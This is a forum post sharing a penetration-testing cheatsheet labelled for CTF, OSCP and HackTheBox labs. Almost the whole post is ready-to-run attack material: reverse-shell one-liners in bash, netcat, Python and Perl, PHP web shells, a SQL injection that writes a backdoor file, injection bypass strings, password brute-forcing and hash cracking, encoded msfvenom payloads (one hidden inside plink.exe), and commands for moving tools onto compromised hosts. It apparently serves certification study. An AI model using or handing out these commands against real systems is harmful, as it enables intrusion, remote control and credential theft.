• DummiesHub believe in censorship free world
  • You will find here everything that can't find anywhere!
  • Sign Up Now!
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5

Hacker's Cheatsheet for CTF, OSCP, HTB

#1
Enumeration
Enumeration is the most important thing you can do, where you find
yourself hitting a wall, 90% of the time it will be because you haven’t
done enough enumeration.
Below are commands which are helpful while you are in the lab:
Nmap
Quick TCP Scan
Code:
nmap -sC -sV -vv -oA quick target
Quick UDP Scan
Code:
nmap -sU -sV -vv -oA quick_udp target
Full TCP Scan
Code:
nmap -sC -sV -p- -vv -oA full target
Port knock
Code:
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-
retries 0 -p $x target; done
Web Scanning
Gobuster quick directory busting
Code:
gobuster -u target -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

Gobuster search with file extension
Code:
gobuster -u target -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
Nikto web server scan
Code:
nikto -h target
Wordpress scan
Code:
wpscan -u target/wp/
Port Checking
Netcat banner grab
Code:
nc -v target port
Telnet banner grab
Code:
telnet target port
SMB
SMB Vulnerability Scan
Code:
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse target
SMB Users & Shares Scan
Code:
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse target
Enum4linux
Code:
enum4linux -a target
Null connect
Code:
rpcclient -U "" target
Connect to SMB share
Code:
smbclient //MOUNT/share
SNMP
SNMP enumeration
Code:
snmp-check target
Reverse Shells
Bash shell
Code:
bash -i >& /dev/tcp/target/4443 0>&1
Netcat Linux
Code:
nc -e /bin/sh target 4443
Netcat Windows
Code:
nc -e cmd.exe target 4443
Python
Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("target",4443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
Code:
perl -e 'use
Socket;$i="target";$p=4443;socket(S,PF_INET,SOCK_STREAM,getproto
byname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN
,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Remote Desktop
Remote Desktop for windows with share and 85% screen
Code:
rdesktop -u username -p password -g 85% -r disk:share=/root/ target
PHP
PHP command injection from GET Request
Code:
<?php echo system($_GET["cmd"]);?>
#Alternative
Code:
<?php echo shell_exec($_GET["cmd"]);?>
Powershell
Non-interactive execute powershell file
Code:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -
NoProfile -File file.ps1
SSH Tunneling / Pivoting
shuttle
sshuttle -vvr [email protected] 10.1.1.0/24
Local port forwarding
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote port forwarding
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic port forwarding
ssh -D <local proxy port> -p <remote port> <target>
Plink local port forwarding
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
SQL Injection
# sqlmap crawl
sqlmap -u http://target --crawl=1
# sqlmap dump database
sqlmap -u http://target --dbms=mysql --dump
# sqlmap shell
sqlmap -u http://target --dbms=mysql --os-shell
Upload php command injection file
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into
OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
Load file
union all select
1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
Bypasses
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -
Brute force
John the Ripper shadow file
$ unshadow passwd shadow > unshadow.db
$ john unshadow.db
# Hashcat SHA512 $6$ shadow file
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username
#Hashcat MD5 $1$ shadow file
hashcat -m 500 -a 0 hash.txt rockyou.txt --username
# Hashcat MD5 Apache webdav file
hashcat -m 1600 -a 0 hash.txt rockyou.txt
# Hashcat SHA1
hashcat -m 100 -a 0 hash.txt rockyou.txt --force
# Hashcat Wordpress
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
RDP user with password list
ncrack -vv --user offsec -P passwords rdp://target
SSH user with password list
hydra -l user -P pass.txt -t 10 target ssh -s 22
FTP user with password list
medusa -h target -u user -P passwords.txt -M ftp
MSFVenom Payloads
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=target
LPORT=4443 -f raw -o shell.php
# Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=target LPORT=4443 -f war
-o shell.war
# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b
"\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
# Linux FreeBSD reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=target LPORT=4443 -
f elf -o shell.elf
# Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=target
LPORT=4443 -e x86/shikata_ga_nai -f c
# Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -
e x86/shikata_ga_nai -f exe -o non_staged.exe
# Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target
LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
# Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443
EXITFUNC=thread -f python -o shell.py
# Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -
f asp -e x86/shikata_ga_nai -o shell.asp
# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=target
LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
# Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -
f js_le -e generic/none -n 18
# Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -
e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
# Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=target
LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e
x86/shikata_ga_nai
# Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=target
LPORT=4443 -f exe -o shell.exe
# Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -
f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-
binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
Interactive Shell
Upgrading to a fully interactive TTY using Python
# Enter while in reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

File Transfers
HTTP
The most common file transfer method.
# In Kali
python -m SimpleHTTPServer 80
# In reverse shell - Linux
wget target/file
# In reverse shell - Windows
powershell -c "(new-object
System.Net.WebClient).DownloadFile('http://target/file.exe','C:\Users\
user\Desktop\file.exe')"
FTP
This process can be mundane, a quick tip would be to be to name the
filename as ‘file’ on your kali machine so that you don’t have to re-write
the script multiple names, you can then rename the file on windows.
# In Kali
python -m pyftpdlib -p 21 -w
# In reverse shell
echo open target > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

# Execute
ftp -v -n -s:ftp.txt
TFTP
Generic.
# In Kali
atftpd --daemon --port 69 /tftp
# In reverse shell
tftp -i target GET nc.exe
Possibly Related Threads…
Thread
Author
  /  
Last Post
Replies: 1
Views: 662
08-09-2019, 02:47 PM
Last Postdeadcyph3r

Forum Jump:

Users browsing this thread: 1 Guest(s)